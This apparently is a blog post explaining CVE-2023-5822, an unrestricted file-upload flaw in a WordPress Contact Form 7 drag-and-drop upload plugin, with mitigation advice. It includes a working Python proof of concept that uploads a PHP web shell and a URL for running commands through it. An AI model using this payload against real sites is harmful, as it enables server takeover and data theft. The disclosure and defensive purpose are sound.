The WordPress plugin “Drag and Drop Multiple File Upload – Contact Form 7” has been widely adopted by site admins to offer smooth file uploads for users, especially through the popular Contact Form 7 plugin. However, a major vulnerability surfaced at the end of 2023 which allows unauthenticated file uploads — potentially leading to remote code execution. Let's go deep into CVE-2023-5822, how it works, proof-of-concept code, and ways you can defend your site.
What is CVE-2023-5822?
CVE-2023-5822 is a critical security flaw in the plugin “Drag and Drop Multiple File Upload – Contact Form 7” (up to version 1.3.7.3). It affects sites where a form field for file uploads has been set up in a permissive way (using * as accepted file type) by an authorized user (Editor or higher).
Authenticated required for setup: Yes, but the attack is unauthenticated if the field is exposed
- CVE: CVE-2023-5822
How Does the Exploit Work?
Normally, file upload fields restrict file types for security (like jpg, png, pdf). However, if someone with *editor* rights sets the field's accepted file types to * (any file), the plugin's backend function skips proper file validation.
The main function at issue is dnd_upload_cf7_upload, which does not check file extensions or MIME types correctly when * is configured. That means any file, including PHP scripts, can be uploaded and placed in an accessible directory.
So, if an attacker finds such a form on your site, they can send a hand-crafted request and upload a PHP shell. If the server executes this file, the attacker gets remote code execution.
Proof-of-Concept (PoC) Exploit
Before running any tests, never run exploit code on servers you do not own or have permission to test. This is a sample exploit for educational use.
Suppose the vulnerable form's upload field URL is https://target-site.com/wp-admin/admin-ajax.php?action=dnd_upload_cf7_upload
Here is a simple Python proof-of-concept
import requests
# Change this to the site's AJAX endpoint
url = "https://target-site.com/wp-admin/admin-ajax.php?action=dnd_upload_cf7_upload"
# PHP shell code
php_payload = "<?php echo shell_exec($_GET['cmd']); ?>"
files = {
'files[]': (
'evil.php',
php_payload,
'application/x-php'
)
}
response = requests.post(url, files=files)
if response.status_code == 200 and "evil.php" in response.text:
print("[+] File uploaded successfully!")
# You should now find the file URL in the response, or by guessing from the plugin's upload path.
else:
print("[-] Upload failed.")
After upload, visit something like https://target-site.com/wp-content/uploads/dnd-upload-files/evil.php?cmd=whoami to run code on the server.
Vulnerability Example: Misconfigured Form Field
If an editor-level user builds a form with a *multiple file upload* field and configures it like this inside Contact Form 7:
[dnd_upload* your-upload-file filetypes:*]
then any file can be uploaded — no restrictions.
No authentication needed: Once misconfigured, anyone on the internet can exploit it.
- WordPress privilege escalation: Code exec could let attackers create admin accounts, steal data, or wipe your site.
Update plugin immediately. The vulnerability is patched in 1.3.7.4 and above
Restrict file uploads: Always specify exact extensions (e.g., jpg, png, pdf).
4. Regularly audit plugins and users: Reduce unnecessary editor/admin users.
References
- NVD – CVE-2023-5822
- Patchstack Disclosure Details
- WPScan Advisory
Final Thoughts
CVE-2023-5822 is a wake-up call for WordPress site owners. Even popular plugins can have dangerous flaws when misconfigured. Always review your plugins, update regularly, and be cautious with file upload functionalities. Limiting accepted file types is a big step toward keeping your site safe.
Timeline
Published on: 11/22/2023 16:15:15 UTC
Last modified on: 11/29/2023 19:15:14 UTC